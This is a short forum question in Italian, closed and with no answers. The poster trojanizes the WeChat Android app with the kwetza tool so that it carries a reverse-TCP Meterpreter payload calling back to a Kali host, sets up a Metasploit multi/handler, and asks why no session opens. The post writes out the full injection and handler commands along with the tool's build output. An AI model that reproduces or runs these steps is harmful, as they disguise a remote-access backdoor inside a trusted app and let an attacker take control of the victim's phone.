Metasploit: exploit che non avvia la connessione al gestore [chiuso]

Naviga le tue risposte
1

Sto utilizzando Android 4.4 VirtualMachine e Kali Linux 2018.4 VirtualMachine.

Rete Lan:
Kali VM: 10.0.0.27
Android VM: 10.0.0.29

Ho fatto un .apk dell'app WeChat con kwetza su Kali: 

git clone https://github.com/sensepost/kwetza.git
mv /home/xyz/Downloads/wechat.apk to kwetza directory
python kwetza.py wechat.apk tcp 10.0.0.27 4444 yes

Poi ho caricato il nuovo wechat.apk che si trova in wechat / dist / wechat.apk nel mio Android VM in / sdcard / Downloads

Su Kali, l'ho fatto: 

use exploit/multi/handler 
set payload android/meterpreter/reverse_tcp 
set LHOST 10.0.0.27 
set LPORT 4444
exploit

Ho installato l'app sul mio Android VM e l'ho lanciato

Ma il mio stdout è: 

Started reverse TCP handler on kali_ipaddress:4444

E non ho Starting payload handler...

Qualcuno può aiutarmi?

ps: ho lo stesso identico problema su Parrot Security 4.3 

    python kwetza.py wechat.apk tcp 10.0.0.27 4444 yes output was :

[*] DECOMPILING TARGET APK
[+] ENDPOINT IP: 10.0.0.27
[+] ENDPOINT PORT: 4444
[+] APKTOOL DECOMPILED SUCCESS
[*] BYTING TCP COMMS
[*] ANALYZING ANDROID MANIFEST
[*] USING CUSTOM ACTIVITY: AssistActivity
[*] PREPARING PAYLOADS
[*] INJECTING INTO APK
[+] CHECKING IF ADDITIONAL PERMS TO BE ADDED
[*] INJECTION OF CRAZY PERMISSIONS TO BE DONE!
[+] TIME TO BUILD INFECTED APK...
[*] EXECUTING APKTOOL BUILD COMMAND...
[+] BUILD RESULT
#####################################
I: Using Apktool 2.3.4-dirty
I: Checking whether sources has changed...
I: Smaling smali folder into classes.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes9 folder into classes9.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes6 folder into classes6.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes4 folder into classes4.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes7 folder into classes7.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes5 folder into classes5.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes8 folder into classes8.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes3 folder into classes3.dex...
I: Checking whether sources has changed...
I: Smaling smali_classes2 folder into classes2.dex...
I: Checking whether resources has changed...
I: Copying raw resources...
I: Copying libs... (/lib)
I: Building apk file...
I: Copying unknown files/dir...
I: Built apk...

#####################################
[*] EXECUTING JARSIGNER COMMAND...
Enter Passphrase for keystore: password
[+] JARSIGNER RESULT
#####################################
jar signed.

Warning: 
The signer's certificate is self-signed.
The MD5withRSA algorithm specified for the -sigalg option is considered a security risk.

#####################################

[+] L00t located at /root/Documents/kwetza/wechat/dist/wechat.apk
    
posta White Bomb 25.11.2018 - 18:51
fonte

0 risposte

Leggi altre domande sui tag

Come recuperare il valore Ki della carta SIM? Come identificare il mittente di un messaggio in crittografia asimmetrica?